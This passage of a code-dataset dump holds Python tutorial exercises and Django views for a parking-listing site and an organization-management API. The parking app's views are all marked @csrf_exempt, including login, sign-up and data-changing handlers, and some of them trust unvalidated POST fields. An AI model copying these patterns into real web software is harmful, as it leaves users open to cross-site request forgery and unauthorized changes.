list(output))\nif list(filter(is_palindrome, range(1, 200))) == [1, 2, 3, 4, 5, 6, 7, 8, 9, 11, 22, 33, 44, 55, 66, 77, 88, 99, 101, 111, 121, 131, 141, 151, 161, 171, 181, 191]:\n    print('Success!')\nelse:\n    print('Fail!')\n#Sorted\nL = [('Bob', 75), ('Adam', 92), ('Bart', 66), ('Lisa', 88)]\n\ndef by_name(t):\n    return t[0]\nL2 = sorted(L, key=by_name)\nprint(L2)\n\ndef by_score(t):\n    return -t[1]\nL2 = sorted(L, key=by_score)\nprint(L2) \n#Returning functions (closures)\ndef createCounter():\n    n = 0\n    def counter():\n        nonlocal n\n        n = n + 1\n        return n\n    return counter\n# Test:\ncounterA = createCounter()\nprint(counterA(), counterA(), counterA(), counterA(), counterA()) # 1 2 3 4 5\ncounterB = createCounter()\nif [counterB(), counterB(), counterB(), counterB()] == [1, 2, 3, 4]:\n    print('Pass!')\nelse:\n    print('Fail!')\n#Anonymous functions (lambda)\nL = list(filter(lambda n: n % 2 == 1, range(1, 20)))\nprint(L)\n#Decorators\nimport time, functools\ndef metric(fn):\n    @functools.wraps(fn)\n    def wrapper(*args, **kw):\n        start = time.time()\n        print('Begin Call!')\n        result = fn(*args, **kw)\n        end = time.time()\n        print('%s executed in %s ms' % (fn.__name__, (end - start) * 1000))\n        print('End Call!')\n        return result\n    return wrapper\n# Test\n@metric\ndef fast(x, y):\n    time.sleep(0.0012)\n    return x + y\n\n@metric\ndef slow(x, y, z):\n    time.sleep(0.1234)\n    return x * y * z\n\nf = fast(11, 22)\ns = slow(11, 22, 33)\nif f != 33:\n    print('Fail!')\nelif s != 7986:\n    print('Fail!')\n#Partial functions\n","sub_path":"python/pythonPractice/LiaoXueFeng/3HanShuShiBianCheng.py","file_name":"3HanShuShiBianCheng.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"12983247","text":"from django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template.loader import get_template\nfrom aparcamientos.models import aparcamientos, aparcamientos_seleccionados, configuracion\nfrom parse import crear_basedatos\nfrom parse_distritos import base_distritos\nfrom django.template import RequestContext\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.hashers import make_password\nimport urllib\nfrom django.template import Context\nimport sqlite3\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Create your views here.\n\n\n@csrf_exempt\ndef about (request):\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\tcontext = {'user': user}\n\ttemplate = get_template('about.html')\n\treturn HttpResponse(template.render(Context(context)))\n\n\n@csrf_exempt\ndef homepage (request):\n\tmethod = request.method\n\ttodos_aparcamientos = aparcamientos.objects.all()\n\taccesibles = aparcamientos_accesibles(request)\n\tfive_ml = fml(request)\n\tconfg_tds = configuracion.objects.all()\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\n\tif not todos_aparcamientos:\n\t\t#Download all the data from the xml\n\t\t(id_entidades, nombres, descripciones, acces, content_urls, nombre_vias, clases_viales, numeros, barrios, distritos, latitudes, longitudes, telefonos, correos, tipos, direcciones, datos_contactos) = crear_basedatos()\n\t\tfor (nom_aparcamiento, descripcion, latitud, longitud, accesibilidad, barrio, distrito, direccion, 
datos_contacto, url) in zip(nombres, descripciones, latitudes, longitudes, acces, barrios, distritos, direcciones, datos_contactos, content_urls): ##http://javiyu.blogspot.com.es/2008/05/funcin-zip-python.html\n\t\t\tnuevo_aparcamiento = aparcamientos(nombre_aparcamiento = nom_aparcamiento ,descripcion = descripcion,\n\t\t\t\t\t\t\t\tlatitud = latitud ,longitud = longitud, accesibilidad = accesibilidad,\n\t\t\t\t\t\t\t\tbarrio = barrio, distrito = distrito, direccion = direccion, \n\t\t\t\t\t\t\t\tdatos_contacto = datos_contacto, url = url)\n\t\t\tnuevo_aparcamiento.save()\n\n\tif method == 'GET':\n\t\t##Probar con form\n\t\tactivo = 0\n\t\tcontext = {'five_ml': five_ml, 'activo': activo , 'accesibles': accesibles, 'confg_tds' : confg_tds, 'user': user}\n\t\ttemplate = get_template('homepage.html')\n\t\treturn HttpResponse(template.render(Context(context)))\n\n\telif method == 'POST':\n\t\tsubmit = request.POST.get(\"submit\")\n\t\tactivo = request.POST.get(\"activo\")\n\t\tapar_id = request.POST.get(\"likes\")\n\t\tlike = request.POST.get(\"like\")\n\t\tuser_name = request.POST.get(\"user\")\n\t\ttry:\n\t\t\tuser = User.objects.get(username = user_name)\n\t\texcept ObjectDoesNotExist: \n\t\t\tuser = None\n\n\t\tif submit == 'Buscar':\n\t\t\t#Mirar por distrito\n\t\t\ttemplate = todos_aparcamientos_distrito(request)\n\t\t\treturn HttpResponse(template)\n\n\t\tif submit == 'Preferencias':\n\t\t\tuser_name = request.user.username\n\t\t\ttry:\n\t\t\t\tuser = User.objects.get(username = user_name)\n\t\t\texcept ObjectDoesNotExist: \n\t\t\t\tuser = None\n\t\t\ttitulo = request.POST.get(\"titulo\")\n\t\t\tletra = request.POST.get(\"letra\") #integer\n\t\t\tcolor = request.POST.get(\"color\")\n\t\t\tconfig_selec = configuracion.objects.get(id=user.id)\n\t\t\tconfig_selec.usuario = user\n\t\t\tif titulo != '':\n\t\t\t\tconfig_selec.titulo = titulo\n\t\t\tif letra != '':\n\t\t\t\tconfig_selec.letra = letra\n\t\t\tif color != '':\n\t\t\t\tconfig_selec.fondo = color\n\t\t\tconfig_selec.save()\n\t\t\treturn HttpResponseRedirect('/')\n\n\t\tif activo == '1':\n\t\t\tactivo = 1\n\t\t\tcontext = {'five_ml': five_ml, 'activo': activo , 'accesibles': accesibles, 'confg_tds' : confg_tds, 'user': user}\n\t\t\ttemplate = get_template('homepage.html')\n\t\t\treturn HttpResponse(template.render(Context(context)))\n\t\telif activo == '0':\n\t\t\tactivo = 0\n\t\t\tcontext = {'five_ml': five_ml, 'activo': activo , 'accesibles': accesibles, 'user': user}\n\t\t\ttemplate = get_template('homepage.html')\n\t\t\treturn HttpResponse(template.render(Context(context)))\n\t\telif activo == '2':\n\t\t\taparcamient = aparcamientos.objects.all()\n\t\t\tactivo = 2\n\t\t\tcontext = {'five_ml': five_ml, 'activo': activo , 'aparcamientos': aparcamient, 'user': user}\n\t\t\ttemplate = get_template('homepage.html')\n\t\t\treturn HttpResponse(template.render(Context(context)))\n\n\t\tif like == 'LIKE!':\n\t\t\taparca_selec = aparcamientos.objects.get(id=apar_id)\n\t\t\tlikes = aparca_selec.likes + 1\n\t\t\taparca_selec.likes = likes\n\t\t\taparca_selec.save()\n\t\telif like == 'Favorito':\n\t\t\tuser_name = request.user.username\n\t\t\ttry:\n\t\t\t\tuser = User.objects.get(username = user_name)\n\t\t\texcept ObjectDoesNotExist: \n\t\t\t\tuser = None\n\t\t\taparca_selec = aparcamientos.objects.get(id=apar_id)\n\t\t\tnew_selec = aparcamientos_seleccionados(aparcamiento=aparca_selec, usuario=user)\n\t\t\tnew_selec.save()\n\t\treturn HttpResponseRedirect(\"/\")\n\n\telse:\n\t\ttemplate = get_template('405HTTP.html')\n\t\treturn 
HttpResponse(template.render())\n\n\n@csrf_exempt\ndef nuevo_usuario(request):\n\tuser_name = urllib.parse.unquote(request.POST.get(\"nombre\"))\n\tpassword = make_password(urllib.parse.unquote(request.POST.get(\"password\")))\n\tusuario = User(username = user_name, password = password)\n\tusuario.save()\n\tusuario = User.objects.get(username=user_name)\n\tnueva_conf = configuracion(usuario=usuario)\n\tnueva_conf.save()\n\tprint(\"USUARIO CREADO CON EXITO\")\n\treturn HttpResponseRedirect('/')\n\n\n@csrf_exempt\ndef authenti(request):\n\tconfg_tds = configuracion.objects.all()\n\ttodos_aparcamientos = aparcamientos.objects.all()\n\taccesibles = aparcamientos_accesibles(request)\n\tfive_ml = fml(request)\n\tusername = request.POST.get(\"nombre\")\n\tpassword = request.POST.get(\"password\")\n\tuser = authenticate(username = username, password = password)\n\tif user is not None:\n\t\tlogin(request, user)\n\t\tprint(\"Estoy logueado\")\n\tactivo = 0\n\tcontext = {'five_ml': five_ml, 'activo': activo , 'accesibles': accesibles, 'user': user, 'confg_tds' : confg_tds }\n\ttemplate = get_template('homepage.html')\n\treturn HttpResponse(template.render(Context(context)))\n\n\n@csrf_exempt\ndef fml(request): #Five More Likes\n\taparcas = aparcamientos.objects.all()\n\tFML = []\n\tfor aparca in aparcas:\n\t\tcont = 0\n\t\tfor aparca2 in aparcas:\t\n\t\t\tif aparca.likes > aparca2.likes:\n\t\t\t\tcont = cont + 1\n\t\tif cont > len(aparcas) - 6:\n\t\t\tFML.append(aparca)\n\treturn (FML)\n\n\n@csrf_exempt\ndef todos_los_aparcamientos (request):\n\tmethod = request.method\n\tapars = aparcamientos.objects.all()\n\tdistritos = base_distritos()\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\ttemplates = get_template('homepage_aparcamientos.html')\n\taparca = aparcamientos.objects.all()\n\tcontext = {'aparca': aparca, 'distritos': distritos, 'user': user}\n\treturn HttpResponse(templates.render(Context(context)))\n\n\n@csrf_exempt\ndef todos_aparcamientos_distrito(request):\n\tdistritos = base_distritos()\n\tapars = aparcamientos.objects.all()\n\tdistrito = urllib.parse.unquote(request.POST.get(\"nombre\")).upper()\n\tapar_distritos = []\n\ttemplates = get_template('homepage_aparcamientos_distrito.html')\n\tboolean = False\n\tfor apar in apars:\n\t\tif apar.distrito == distrito:\n\t\t\tapar_distritos.append(apar)\n\t\t\tboolean = True\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\tcontext = {'distrito': distrito, 'distritos': distritos, 'apar_distritos': apar_distritos, 'boolean': boolean, 'user': user}\n\treturn HttpResponse(templates.render(Context(context)))\n\n\n@csrf_exempt\ndef pag_info_aparcamiento(request,idn):\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\taparcamiento = aparcamientos.objects.get(id = idn)\n\ttemplates = get_template('pag_info_aparcamiento.html')\n\tcontext = {'aparcamiento': aparcamiento, 'user': user}\n\treturn HttpResponse(templates.render(Context(context)))\n\n\n@csrf_exempt\ndef aparcamientos_accesibles(request):\n\taccesibles = []\n\tapars = aparcamientos.objects.all()\n\tfor apar in apars:\n\t\tif apar.accesibilidad == 1:\n\t\t\taccesibles.append(apar)\n\treturn accesibles\n\n\n@csrf_exempt\ndef pagina_usuario(request, usuario):\n\tuser_id = 
User.objects.get(username=usuario).id\n\tconf = configuracion.objects.get(usuario_id = user_id)\n\tuser_name = request.user.username\n\taparcamien = aparcamientos.objects.all()\n\ttry:\n\t\tuser_log = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser_log = None\n\tuser = User.objects.get(username=usuario)\n\t\n\tapar_selec = aparcamientos_seleccionados.objects.filter(usuario=user.id) #Filtro apar solo de ese usuario\n\tcontext = {'apar_selec': apar_selec, 'user_log': user_log, 'user': user, \n\t\t\t 'aparcamien': aparcamien, 'conf' : conf, 'usuario': usuario}\n\ttemplate = get_template(\"pagina_usuario.html\")\n\treturn HttpResponse(template.render(Context(context)))\n\n@csrf_exempt\ndef usuario_xml(request, user_xml):\n\tfavs = []\n\tuser = User.objects.get(username = user_xml)\n\taparcamiento_fav = aparcamientos_seleccionados.objects.filter(usuario=user)\n\tfor fav in aparcamiento_fav:\n\t\tfavs += [fav.aparcamiento]\n\tcontext = {\"favs\" : favs, 'user_xml': user_xml}\n\ttemplate = get_template(\"usuario.xml\")\n\treturn HttpResponse(template.render(Context(context)), content_type = \"text/xml\")\n\n\n@csrf_exempt\ndef preferencias(request):\n\tuser_name = request.user.username\n\ttry:\n\t\tuser = User.objects.get(username = user_name)\n\texcept ObjectDoesNotExist: \n\t\tuser = None\n\ttemplate = get_template(\"preferencias.html\")\n\tcontext = {'user': user}\n\treturn HttpResponse(template.render(Context(context)))\n\n\n@csrf_exempt\ndef lgout (request):\n\tlogout(request)\n\treturn HttpResponseRedirect('/')\n\n\n@csrf_exempt\ndef ppl_xml(request):\n\tfive_ml = fml(request)\n\tcontext = {'five_ml' : five_ml}\n\ttemplate = get_template(\"likes.xml\")\n\treturn HttpResponse(template.render(Context(context)), content_type = \"text/xml\")\n","sub_path":"aparcamientos/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"70089760","text":"#coding=utf-8\nimport traceback\nimport datetime\nfrom django.core.paginator import Paginator, EmptyPage\nfrom django.db.models import Q, FieldDoesNotExist\n# Create your views here.\nfrom django.db.models import QuerySet\nfrom rest_framework import filters , viewsets\n\nfrom org.models import organization, orgTransactionPhase, orgRemarks\nfrom org.serializer import OrgCommonSerializer, OrgDetailSerializer, \\\n OrgRemarkDetailSerializer, OrgCreateSerializer, OrgUpdateSerializer\nfrom sourcetype.models import TransactionPhases, DataSource\nfrom utils.customClass import InvestError, JSONResponse, RelationFilter, MySearchFilter\nfrom utils.util import loginTokenIsAvailable, catchexcption, read_from_cache, write_to_cache, returnListChangeToLanguage, \\\n returnDictChangeToLanguage, SuccessResponse, InvestErrorResponse, ExceptionResponse, setrequestuser, add_perm, \\\n cache_delete_key, mySortQuery\nfrom django.db import transaction,models\nfrom django_filters import FilterSet\n\n\nclass OrganizationFilter(FilterSet):\n stockcode = RelationFilter(filterstr='stockcode',lookup_method='in')\n stockshortname = RelationFilter(filterstr='stockshortname',lookup_method='in')\n industrys = RelationFilter(filterstr='industry',lookup_method='in')\n currencys = RelationFilter(filterstr='currency',lookup_method='in')\n orgname = RelationFilter(filterstr='orgnameC')\n orgtransactionphases = RelationFilter(filterstr='orgtransactionphase',lookup_method='in',relationName='org_orgTransactionPhases__is_deleted')\n orgtypes = 
RelationFilter(filterstr='orgtype',lookup_method='in')\n orgstatus = RelationFilter(filterstr='orgstatus',lookup_method='in')\n tags = RelationFilter(filterstr='org_users__tags',lookup_method='in',relationName='org_users__user_usertags__is_deleted')\n area = RelationFilter(filterstr='org_users__orgarea',lookup_method='in',relationName='org_users__is_deleted')\n trader = RelationFilter(filterstr='org_users__investor_relations__traderuser',lookup_method='in',relationName='org_users__investor_relations__is_deleted')\n class Meta:\n model = organization\n fields = ['orgname','orgstatus','currencys','industrys','orgtransactionphases','orgtypes','tags','area','trader','stockcode','stockshortname']\n\nclass OrganizationView(viewsets.ModelViewSet):\n \"\"\"\n list:获取机构列表\n create:新增机构\n retrieve:查看机构详情\n update:修改机构信息\n destroy:删除机构\n \"\"\"\n filter_backends = (MySearchFilter,filters.DjangoFilterBackend,)\n queryset = organization.objects.filter(is_deleted=False)\n filter_class = OrganizationFilter\n search_fields = ('orgnameC','orgnameE','stockcode')\n serializer_class = OrgDetailSerializer\n redis_key = 'organization'\n\n def get_queryset(self):\n assert self.queryset is not None, (\n \"'%s' should either include a `queryset` attribute, \"\n \"or override the `get_queryset()` method.\"\n % self.__class__.__name__\n )\n queryset = self.queryset\n if isinstance(queryset, QuerySet):\n if self.request.user.is_authenticated:\n queryset = queryset.filter(datasource=self.request.user.datasource)\n else:\n queryset = queryset.all()\n else:\n raise InvestError(code=8890)\n return queryset\n\n def get_object(self, pk=None):\n if pk:\n obj = read_from_cache(self.redis_key + '_%s' % pk)\n if not obj:\n try:\n obj = self.get_queryset().get(id=pk)\n except organization.DoesNotExist:\n raise InvestError(code=5002)\n else:\n write_to_cache(self.redis_key + '_%s' % pk, obj)\n else:\n lookup_url_kwarg = 'pk'\n obj = read_from_cache(self.redis_key + '_%s' % self.kwargs[lookup_url_kwarg])\n if not obj:\n try:\n obj = self.get_queryset().get(id=self.kwargs[lookup_url_kwarg])\n except organization.DoesNotExist:\n raise InvestError(code=5002)\n else:\n write_to_cache(self.redis_key + '_%s' % self.kwargs[lookup_url_kwarg], obj)\n if obj.datasource != self.request.user.datasource:\n raise InvestError(code=8888)\n return obj\n\n\n def list(self, request, *args, **kwargs):\n try:\n page_size = request.GET.get('page_size')\n page_index = request.GET.get('page_index') # 从第一页开始\n lang = request.GET.get('lang')\n source = request.META.get('HTTP_SOURCE')\n if source:\n datasource = DataSource.objects.filter(id=source, is_deleted=False)\n if datasource.exists():\n userdatasource = datasource.first()\n queryset = self.get_queryset().filter(datasource=userdatasource)\n else:\n raise InvestError(code=8888)\n else:\n raise InvestError(code=8888, msg='unavailable source')\n if not page_size:\n page_size = 10\n if not page_index:\n page_index = 1\n queryset = self.filter_queryset(queryset)\n sortfield = request.GET.get('sort', 'createdtime')\n desc = request.GET.get('desc', 1)\n queryset = mySortQuery(queryset, sortfield, desc)\n setrequestuser(request)\n if request.user.is_anonymous:\n serializerclass = OrgCommonSerializer\n else:\n if request.user.has_perm('org.admin_getorg'):\n serializerclass = OrgDetailSerializer\n else:\n serializerclass = OrgCommonSerializer # warning\n try:\n count = queryset.count()\n queryset = Paginator(queryset, page_size)\n queryset = queryset.page(page_index)\n except EmptyPage:\n return 
JSONResponse(SuccessResponse({'count': 0, 'data': []}))\n responselist = []\n for instance in queryset:\n actionlist = {'get': False, 'change': False, 'delete': False}\n if request.user.is_anonymous:\n pass\n else:\n if request.user.has_perm('org.admin_getorg') or request.user.has_perm('org.user_getorg',instance):\n actionlist['get'] = True\n if request.user.has_perm('org.admin_changeorg') or request.user.has_perm('org.user_changeorg',instance):\n actionlist['change'] = True\n if request.user.has_perm('org.admin_deleteorg') or request.user.has_perm('org.user_deleteorg',instance):\n actionlist['delete'] = True\n instancedata = serializerclass(instance).data\n instancedata['action'] = actionlist\n responselist.append(instancedata)\n return JSONResponse(SuccessResponse({'count':count,'data':returnListChangeToLanguage(responselist,lang)}))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def create(self, request, *args, **kwargs):\n data = request.data\n lang = request.GET.get('lang')\n data['createuser'] = request.user.id\n data['datasource'] = request.user.datasource.id\n if request.user.has_perm('org.admin_addorg'):\n pass\n elif request.user.has_perm('org.user_addorg'):\n data['orgstatus'] = 1\n else:\n raise InvestError(2009)\n try:\n with transaction.atomic():\n orgTransactionPhases = data.pop('orgtransactionphase', None)\n orgserializer = OrgCreateSerializer(data=data)\n if orgserializer.is_valid():\n org = orgserializer.save()\n if orgTransactionPhases and isinstance(orgTransactionPhases,list):\n orgTransactionPhaselist = []\n for transactionPhase in orgTransactionPhases:\n orgTransactionPhaselist.append(orgTransactionPhase(org=org, transactionPhase_id=transactionPhase,createuser=request.user,createdtime=datetime.datetime.now()))\n org.org_orgTransactionPhases.bulk_create(orgTransactionPhaselist)\n else:\n raise InvestError(code=20071, msg='data有误_%s' % orgserializer.errors)\n if org.createuser:\n add_perm('org.user_getorg', org.createuser, org)\n add_perm('org.user_changeorg', org.createuser, org)\n add_perm('org.user_deleteorg', org.createuser, org)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgDetailSerializer(org).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def retrieve(self, request, *args, **kwargs):\n try:\n org = self.get_object()\n orgusers = org.org_users.all().filter(is_deleted=False)\n lang = request.GET.get('lang')\n if request.user.has_perm('org.admin_getorg'):\n orgserializer = OrgDetailSerializer\n elif request.user.has_perm('org.user_getorg', org):\n orgserializer = OrgDetailSerializer\n elif request.user.trader_relations.all().filter(is_deleted=False, investoruser__in=orgusers).exists():\n orgserializer = OrgDetailSerializer\n else:\n orgserializer = OrgCommonSerializer\n serializer = orgserializer(org)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(serializer.data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n\n @loginTokenIsAvailable()\n def update(self, request, *args, 
**kwargs):\n data = request.data\n lang = request.GET.get('lang')\n IPOdate = data.pop('IPOdate', None)\n if IPOdate not in ['None', None, u'None', 'none']:\n data['IPOdate'] = datetime.datetime.strptime(IPOdate[0:10], '%Y-%m-%d')\n data['lastmodifyuser'] = request.user.id\n data['lastmodifytime'] = datetime.datetime.now()\n try:\n org = self.get_object()\n if request.user.has_perm('org.admin_changeorg'):\n pass\n elif request.user.has_perm('org.user_changeorg', org):\n data.pop('orgstatus', None)\n else:\n raise InvestError(code=2009)\n with transaction.atomic():\n orgTransactionPhases = data.pop('orgtransactionphase', None)\n orgupdateserializer = OrgUpdateSerializer(org, data=data)\n if orgupdateserializer.is_valid():\n org = orgupdateserializer.save()\n if orgTransactionPhases:\n transactionPhaselist = TransactionPhases.objects.filter(is_deleted=False).in_bulk(orgTransactionPhases)\n addlist = [item for item in transactionPhaselist if item not in org.orgtransactionphase.all()]\n removelist = [item for item in org.orgtransactionphase.all() if item not in transactionPhaselist]\n org.org_orgTransactionPhases.filter(transactionPhase__in=removelist, is_deleted=False).update(is_deleted=True,\n deletedtime=datetime.datetime.now(),\n deleteduser=request.user)\n usertaglist = []\n for transactionPhase in addlist:\n usertaglist.append(orgTransactionPhase(org=org, transactionPhase_id=transactionPhase, createuser=request.user,createdtime=datetime.datetime.now()))\n org.org_orgTransactionPhases.bulk_create(usertaglist)\n else:\n raise InvestError(code=20071,\n msg='data有误_%s\\n%s' % (orgupdateserializer.error_messages, orgupdateserializer.errors))\n cache_delete_key(self.redis_key + '_%s' % org.id)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgDetailSerializer(org).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def destroy(self, request, *args, **kwargs):\n try:\n instance = self.get_object()\n lang = request.GET.get('lang')\n if request.user.has_perm('org.admin_deleteorg'):\n pass\n elif request.user.has_perm('org.user_deleteorg',instance) and instance.orgstatus != 2:\n pass\n else:\n raise InvestError(code=2009)\n with transaction.atomic():\n for link in ['org_users','org_orgTransactionPhases','org_remarks','org_unreachuser','org_orgBDs']:\n if link in ['org_users', 'org_orgBDs']:\n manager = getattr(instance, link, None)\n if not manager:\n continue\n # one to one\n if isinstance(manager, models.Model):\n if hasattr(manager, 'is_deleted') and not manager.is_deleted:\n raise InvestError(code=2010, msg=u'{} 上有关联数据'.format(link))\n else:\n try:\n manager.model._meta.get_field('is_deleted')\n if manager.all().filter(is_deleted=False).count():\n raise InvestError(code=2010, msg=u'{} 上有关联数据'.format(link))\n except FieldDoesNotExist:\n if manager.all().count():\n raise InvestError(code=2010, msg=u'{} 上有关联数据,且没有is_deleted字段'.format(link))\n else:\n manager = getattr(instance, link, None)\n if not manager:\n continue\n # one to one\n if isinstance(manager, models.Model):\n if hasattr(manager, 'is_deleted') and not manager.is_deleted:\n manager.is_deleted = True\n manager.save()\n else:\n try:\n manager.model._meta.get_field('is_deleted')\n if manager.all().filter(is_deleted=False).count():\n manager.all().update(is_deleted=True)\n except FieldDoesNotExist:\n pass\n instance.is_deleted 
= True\n instance.deleteduser = request.user\n instance.deletetime = datetime.datetime.utcnow()\n instance.save()\n cache_delete_key(self.redis_key + '_%s' % instance.id)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgDetailSerializer(instance).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\nclass OrgRemarkView(viewsets.ModelViewSet):\n \"\"\"\n list:获取机构备注列表\n create:新增机构备注\n retrieve:查看机构某条备注详情(id)\n update:修改机构备注信息(id)\n destroy:删除机构备注 (id)\n \"\"\"\n filter_backends = (filters.DjangoFilterBackend,)\n queryset = orgRemarks.objects.filter(is_deleted=False)\n filter_fields = ('id','org','createuser')\n serializer_class = OrgRemarkDetailSerializer\n\n def get_queryset(self):\n assert self.queryset is not None, (\n \"'%s' should either include a `queryset` attribute, \"\n \"or override the `get_queryset()` method.\"\n % self.__class__.__name__\n )\n queryset = self.queryset\n if isinstance(queryset, QuerySet):\n if self.request.user.is_authenticated:\n queryset = queryset.filter(datasource=self.request.user.datasource)\n else:\n queryset = queryset.all()\n else:\n raise InvestError(code=8890)\n return queryset\n\n def get_object(self, pk=None):\n if pk:\n try:\n obj = self.queryset.get(id=pk)\n except orgRemarks.DoesNotExist:\n raise InvestError(code=5002)\n else:\n try:\n obj = self.queryset.get(id=self.kwargs['pk'])\n except orgRemarks.DoesNotExist:\n raise InvestError(code=5002)\n if obj.datasource != self.request.user.datasource:\n raise InvestError(code=8888)\n return obj\n\n def get_org(self,orgid):\n if self.request.user.is_anonymous:\n raise InvestError(code=8889)\n try:\n org = organization.objects.get(id=orgid,is_deleted=False,datasource=self.request.user.datasource)\n except organization.DoesNotExist:\n raise InvestError(code=5002)\n else:\n return org\n\n @loginTokenIsAvailable()\n def list(self, request, *args, **kwargs):\n try:\n page_size = request.GET.get('page_size')\n page_index = request.GET.get('page_index') # 从第一页开始\n lang = request.GET.get('lang')\n if not page_size:\n page_size = 10\n if not page_index:\n page_index = 1\n queryset = self.filter_queryset(self.get_queryset())\n if request.user.has_perm('org.admin_getorgremark'):\n queryset = queryset.filter(datasource=request.user.datasource)\n else:\n queryset = queryset.filter(createuser_id=request.user.id)\n try:\n count = queryset.count()\n queryset = Paginator(queryset, page_size)\n queryset = queryset.page(page_index)\n except EmptyPage:\n return JSONResponse(SuccessResponse({'count': 0, 'data': []}))\n serializer = OrgRemarkDetailSerializer(queryset, many=True)\n return JSONResponse(SuccessResponse({'count':count,'data':returnListChangeToLanguage(serializer.data,lang)}))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def create(self, request, *args, **kwargs):\n data = request.data\n lang = request.GET.get('lang')\n orgid = data.get('org',None)\n if orgid:\n org = self.get_org(orgid=orgid)\n if request.user.has_perm('org.admin_addorgremark'):\n pass\n elif request.user.has_perm('org.user_addorgremark'):\n pass\n else:\n raise InvestError(code=2009)\n else:\n raise InvestError(code=20072)\n data['createuser'] = request.user.id\n data['datasource'] = 
request.user.datasource.id\n try:\n with transaction.atomic():\n orgremarkserializer = OrgRemarkDetailSerializer(data=data)\n if orgremarkserializer.is_valid():\n orgremark = orgremarkserializer.save()\n else:\n raise InvestError(code=20071,\n msg='data有误_%s\\n%s' % (orgremarkserializer.error_messages, orgremarkserializer.errors))\n if orgremark.createuser:\n add_perm('org.user_getorgremark', orgremark.createuser, orgremark)\n add_perm('org.user_changeorgremark', orgremark.createuser, orgremark)\n add_perm('org.user_deleteorgremark', orgremark.createuser, orgremark)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgRemarkDetailSerializer(orgremark).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def retrieve(self, request, *args, **kwargs):\n try:\n lang = request.GET.get('lang')\n orgremark = self.get_object()\n if request.user.has_perm('org.admin_getorgremark'):\n orgremarkserializer = OrgRemarkDetailSerializer\n elif request.user.has_perm('org.user_getorgremark',orgremark):\n orgremarkserializer = OrgRemarkDetailSerializer\n else:\n raise InvestError(code=2009)\n serializer = orgremarkserializer(orgremark)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(serializer.data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def update(self, request, *args, **kwargs):\n try:\n orgremark = self.get_object()\n lang = request.GET.get('lang')\n if request.user.has_perm('org.admin_changeorgremark'):\n pass\n elif request.user.has_perm('org.user_changeorgremark', orgremark):\n pass\n else:\n raise InvestError(code=2009)\n data = request.data\n data['lastmodifyuser'] = request.user.id\n data['lastmodifytime'] = datetime.datetime.now()\n data['datasource'] = request.user.datasource.id\n with transaction.atomic():\n orgserializer = OrgRemarkDetailSerializer(orgremark, data=data)\n if orgserializer.is_valid():\n org = orgserializer.save()\n else:\n raise InvestError(code=20071,\n msg='data有误_%s' % orgserializer.errors)\n return JSONResponse(SuccessResponse(returnDictChangeToLanguage(OrgRemarkDetailSerializer(org).data,lang)))\n except InvestError as err:\n return JSONResponse(InvestErrorResponse(err))\n except Exception:\n catchexcption(request)\n return JSONResponse(ExceptionResponse(traceback.format_exc().split('\\n')[-2]))\n\n @loginTokenIsAvailable()\n def destroy(self, request, *args, **kwargs):\n try:\n lang = request.GET.get('lang')\n instance = self.get_object()\n\n if request.user.has_perm('org.admin_deleteorgremark'):\n pass\n elif request.user.has_perm('org.user_deleteorgremark', instance):\n pass\n else:\n raise InvestError(code=2009, msg='没有权限')\n with transaction.atomic():\n instance.is_deleted = True\n instance.deleteduser = request.user\n instance.deletedtime = datetime.datetime.now()\n 